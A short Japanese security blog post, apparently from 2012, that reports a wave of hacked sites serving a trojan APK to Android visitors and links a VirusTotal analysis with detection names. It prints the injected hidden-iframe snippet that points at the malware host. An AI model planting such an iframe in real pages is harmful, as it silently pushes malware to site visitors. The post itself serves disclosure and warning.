androidczad.info Androidマルウェア自動ダウンロード改ざん


 たくさんの改ざんされた普通の一般サイトに不正なIFRAMEタグが第三者によって挿入され、アクセスしてきたユーザーが仮にAndroid端末だと、トロイの木馬なAPKファイルが端末に自動ダウンロードされてしまう手口。
gaoanalitics.info サイト改ざん 約3,000件 2012年5月


 その新しい攻撃を日本の一般サイトで確認。 イメージ 1



</html>
<iframe style="visibility: hidden; display: none; display: none;" src="http:// androidczad .info/"></iframe>


 ダウンロードされたアプリ(update.apk)は、ユーザー手動でインストールしない限り感染状態とはならないということで、前回はアプリ名「com.Security.Update」を名乗ってたようですが、今回もイヤらしく「com.Android.Fixed.Update」となってます。もう先週から攻撃が始まってたみたい。


> www.virustotal.com/file/594035f1eb02b5e109c84d50f94403943bae8d73d1d9ccc4fce5542a2168cb25/analysis/1341907100/



  • Android:NotCom-A (avast!)

  • Android.Proxy.1.origin (Dr.Web)